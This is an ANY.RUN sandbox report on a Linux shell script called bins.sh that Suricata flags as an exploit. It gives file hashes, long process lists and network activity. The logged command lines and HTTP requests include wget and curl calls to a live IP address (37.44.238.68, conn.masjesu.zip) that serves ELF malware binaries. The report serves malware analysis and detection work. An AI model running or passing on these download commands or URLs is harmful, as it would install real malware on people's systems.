Malware analysis bins.sh Malicious activity | ANY.RUN

Add for printing

File name:	bins.sh
Full analysis:	https://app.any.run/tasks/2bd0d328-107d-4a5b-b968-514df2d6360a
Verdict:	Malicious activity
Analysis date:	December 13, 2024, 22:14:06
OS:	Ubuntu 22.04.2 LTS
Tags:	exploit
Indicators:
MIME:	text/x-shellscript
File info:	Bourne-Again shell script, ASCII text executable, with very long lines (405)
MD5:	F7FEFCFA0BCD518582EB4BF6D78B1DD1
SHA1:	ABAB64907400CDD62B54338EE09C745F9004B37C
SHA256:	28C69AF3CD8738B494E4E75D1B590F5FB533C9819839B9CCA3E4285A12B4C587
SSDEEP:	192:r0yYjyjWjXCCsmHjsz75YV0c/jyjWjXCCBHjsz7AA:r1YGiQ7YV06GiBA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- EXPLOIT has been detected (SURICATA)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39101)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39100)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39233)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39234)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39300)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39303)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39299)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39304)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39305)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39308)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39317)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39313)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39312)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39316)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39321)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39322)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39309)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39333)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39337)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39334)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39329)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39330)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39325)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39326)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39338)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39421)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39422)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39425)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39429)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39430)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39433)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39438)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39439)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39434)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39443)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39442)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39447)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39446)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39450)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39451)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39456)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39455)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 38739)
- Executes commands using command-line interpreter
  - sudo (PID: 38742)
- Potential Corporate Privacy Violation
  - curl (PID: 38861)
  - wget (PID: 38746)
  - wget (PID: 38828)
  - wget (PID: 38798)
  - wget (PID: 38859)
  - wget (PID: 38893)
  - wget (PID: 38929)
  - wget (PID: 38960)
  - busybox (PID: 39232)
  - wget (PID: 39240)
  - busybox (PID: 39099)
  - busybox (PID: 39133)
  - busybox (PID: 39202)
  - wget (PID: 39277)
  - busybox (PID: 38793)
  - busybox (PID: 38823)
  - busybox (PID: 38919)
  - busybox (PID: 38986)
  - busybox (PID: 38853)
  - busybox (PID: 38888)
  - busybox (PID: 39170)
  - busybox (PID: 38955)
  - busybox (PID: 39272)
- Connects to the server without a host name
  - busybox (PID: 38919)
  - wget (PID: 38893)
  - busybox (PID: 38853)
  - wget (PID: 38929)
  - wget (PID: 38746)
  - wget (PID: 38828)
  - busybox (PID: 38888)
  - wget (PID: 38859)
  - curl (PID: 38861)
  - busybox (PID: 38955)
  - wget (PID: 38960)
  - busybox (PID: 38986)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (PID: 38990)
  - busybox (PID: 39133)
  - busybox (PID: 39232)
  - busybox (PID: 39099)
  - busybox (PID: 39170)
  - busybox (PID: 39202)
  - wget (PID: 39277)
  - wget (PID: 39240)
- Reads /proc/mounts (likely used to find writable filesystems)
  - curl (PID: 38861)
  - curl (PID: 38995)
  - curl (PID: 39241)
- Executes the "rm" command to delete files or directories
  - bash (PID: 38743)
- Uses wget to download content
  - bash (PID: 38743)
- Connects to unusual port
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39026)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39029)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39020)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39032)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39031)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39024)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39027)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39033)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39028)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39036)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39022)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39035)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39025)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39030)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39021)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39037)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39023)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39019)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39034)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39038)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39039)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39044)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39041)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39050)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39043)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39047)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39057)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39059)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39040)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39055)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39042)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39052)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39051)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39056)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39048)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39049)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39046)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39053)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39054)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39045)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39064)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39060)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39061)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39058)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39069)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39068)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39066)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39067)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39065)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39062)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39063)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39071)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39075)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39073)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39072)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39074)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39077)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39078)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39076)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39070)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39081)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39085)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39080)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39084)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39079)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39083)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39092)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39090)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39082)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39086)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39091)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39087)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39088)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39089)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39098)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39094)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39093)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39095)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39097)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39096)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39296)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39297)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39303)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39320)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39350)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39351)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39343)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39344)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39349)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39352)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39348)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39342)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39357)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39347)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39345)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39341)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39354)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39355)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39360)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39346)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39356)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39359)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39358)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39353)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39361)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39364)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39374)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39363)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39378)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39371)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39375)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39365)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39367)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39372)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39377)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39366)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39368)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39362)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39370)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39373)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39369)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39382)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39376)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39383)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39381)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39384)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39379)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39386)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39387)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39385)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39380)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39388)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39398)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39389)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39391)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39393)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39394)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39405)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39401)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39395)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39392)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39399)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39406)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39400)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39397)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39403)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39390)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39407)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39396)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39402)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39409)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39410)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39408)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39404)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39411)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39413)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39412)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39416)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39414)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39415)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39417)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39418)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39437)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39420)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39419)
  - z2wrrzWPta2OONrVacraoHFL7XZSARgsmJ (deleted) (PID: 39454)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.sh	\|	Linux/UNIX shell script (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

599

Monitored processes

390

Malicious processes

221

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
38738	/bin/sh -c "sudo chown user /tmp/bins\.sh && chmod +x /tmp/bins\.sh && DISPLAY=:0 sudo -iu user /tmp/bins\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN
38739	sudo chown user /tmp/bins.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38740	chown user /tmp/bins.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38741	chmod +x /tmp/bins.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38742	sudo -iu user /tmp/bins.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN
38743	/bin/bash /tmp/bins.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN
38744	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38745	/bin/rm bins.sh	/usr/bin/rm	—	bash
User: user Integrity Level: UNKNOWN Exit code: 256
38746	wget http://37.44.238.68/bins/kDvZh4Y78ren6lyYIzjtUCZih5X12LqBs4	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38747	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
39133	busybox	/home/user/d3vAGKWxIxSqnoVbD9pI8wSoTrmcfYgiKX		binary
		MD5:—	SHA256:—
39202	busybox	/home/user/HYJ8oHgHo5r5if9tNuYBuNvZRt3GyuuUWP		binary
		MD5:—	SHA256:—
39232	busybox	/home/user/ecuTMiqNnmGz49R8gU3Sf38acTRqhhwt5j		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

13 278

DNS requests

Threats

122

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38823	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/dN6Kx7vkAVabhZNPf5PQhaBfm6PMD9LZIP	unknown	—	—	—
38793	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/kDvZh4Y78ren6lyYIzjtUCZih5X12LqBs4	unknown	—	—	—
38955	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/JLz5F8cVufccF2QkuSyTi6OUFAyvqq0bj2	unknown	—	—	—
38888	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/s5hGl4el15wq2VI4aWuA2ml7S3Pw3CLwRa	unknown	—	—	—
38853	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/ePt3aJqxKUEvqkItPyov2GfK1j3UL7IuD7	unknown	—	—	—
38919	busybox	GET	—	37.44.238.68:80	http://37.44.238.68/bins/c8Eh3sf3yFgQ724qSbk2Jk1xfOWJFQ0ABN	unknown	—	—	—
38929	wget	GET	200	37.44.238.68:80	http://37.44.238.68/bins/JLz5F8cVufccF2QkuSyTi6OUFAyvqq0bj2	unknown	—	—	—
38893	wget	GET	200	37.44.238.68:80	http://37.44.238.68/bins/c8Eh3sf3yFgQ724qSbk2Jk1xfOWJFQ0ABN	unknown	—	—	—
38861	curl	GET	200	37.44.238.68:80	http://37.44.238.68/bins/s5hGl4el15wq2VI4aWuA2ml7S3Pw3CLwRa	unknown	—	—	—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	91.189.91.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
1178	snap-store	37.19.194.80:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
38746	wget	37.44.238.68:80	conn.masjesu.zip	Harmony Hosting SARL	FR	unknown
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	37.44.238.68:80	conn.masjesu.zip	Harmony Hosting SARL	FR	unknown
38793	busybox	37.44.238.68:80	conn.masjesu.zip	Harmony Hosting SARL	FR	unknown
38798	wget	37.44.238.68:80	conn.masjesu.zip	Harmony Hosting SARL	FR	unknown
38823	busybox	37.44.238.68:80	conn.masjesu.zip	Harmony Hosting SARL	FR	unknown

DNS requests

Domain	IP	Reputation
google.com	142.250.185.110 2a00:1450:4001:830::200e	whitelisted
connectivity-check.ubuntu.com	91.189.91.48 91.189.91.96 185.125.190.96 185.125.190.98 91.189.91.97 185.125.190.17 91.189.91.98 185.125.190.49 185.125.190.48 185.125.190.18 91.189.91.49 185.125.190.97 2620:2d:4002:1::198 2620:2d:4000:1::22 2620:2d:4002:1::197 2620:2d:4000:1::97 2620:2d:4002:1::196 2001:67c:1562::23 2620:2d:4000:1::2a 2620:2d:4000:1::96 2620:2d:4000:1::98 2620:2d:4000:1::2b 2001:67c:1562::24 2620:2d:4000:1::23	whitelisted
odrs.gnome.org	37.19.194.80 207.211.211.26 212.102.56.178 169.150.255.180 195.181.175.41 195.181.170.19 169.150.255.183 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::11 2a02:6ea0:c700::101 2a02:6ea0:c700::107 2a02:6ea0:c700::112 2a02:6ea0:c700::21	whitelisted
api.snapcraft.io	185.125.188.58 185.125.188.55 185.125.188.59 185.125.188.54 2620:2d:4000:1010::42 2620:2d:4000:1010::117 2620:2d:4000:1010::2e6 2620:2d:4000:1010::6d	whitelisted
161.100.168.192.in-addr.arpa	—	unknown
conn.masjesu.zip	37.44.238.68 87.121.86.228	unknown

Threats

PID	Process	Class	Message
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Misc Attack	ET COMPROMISED Known Compromised or Hostile Host Traffic group 18
—	—	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

bins.sh

F7FEFCFA0BCD518582EB4BF6D78B1DD1

ABAB64907400CDD62B54338EE09C745F9004B37C

28C69AF3CD8738B494E4E75D1B590F5FB533C9819839B9CCA3E4285A12B4C587

192:r0yYjyjWjXCCsmHjsz75YV0c/jyjWjXCCBHjsz7AA:r1YGiQ7YV06GiBA

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

EXPLOIT has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Connects to the server without a host name

Reads /proc/mounts (likely used to find writable filesystems)

Executes the "rm" command to delete files or directories

Uses wget to download content

Connects to unusual port

INFO

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings